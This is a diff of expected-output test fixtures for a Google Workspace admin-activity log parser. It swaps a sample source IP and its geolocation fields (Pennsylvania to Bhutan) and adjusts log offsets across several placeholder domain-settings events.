+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -2257,7 +2089,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -2269,26 +2101,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 18233,
+ "log.offset": 18191,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -2309,7 +2137,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EDU_TYPE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EDU_TYPE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -2323,26 +2151,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 18617,
+ "log.offset": 18574,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -2364,7 +2188,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_OAUTH_CONSUMER_KEY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_OAUTH_CONSUMER_KEY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -2377,26 +2201,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 19064,
+ "log.offset": 19020,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -2418,7 +2238,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSO_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSO_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -2431,26 +2251,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 19493,
+ "log.offset": 19448,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -2472,7 +2288,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -2485,26 +2301,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 19908,
+ "log.offset": 19862,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -2525,7 +2337,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EU_REPRESENTATIVE_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EU_REPRESENTATIVE_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -2539,26 +2351,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 20315,
+ "log.offset": 20268,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -2579,7 +2387,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_TRANSFER_TOKEN\"}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_TRANSFER_TOKEN\"}}",
 "event.provider": "admin",
 "event.type": [
 "creation"
@@ -2590,26 +2398,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 20778,
+ "log.offset": 20730,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -2630,7 +2434,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BACKGROUND_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BACKGROUND_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -2644,26 +2448,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 21103,
+ "log.offset": 21054,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -2684,7 +2484,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BORDER_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BORDER_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -2698,26 +2498,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 21564,
+ "log.offset": 21514,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -2738,7 +2534,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_ACTIVITY_TRACE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_ACTIVITY_TRACE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -2752,26 +2548,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 22021,
+ "log.offset": 21970,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -2792,7 +2584,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_ENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"},{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_ENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"},{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -2805,26 +2597,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 22480,
+ "log.offset": 22428,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -2845,7 +2633,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_UNENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_UNENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"}]}}", "event.provider": "admin", "event.type": [ "change" 
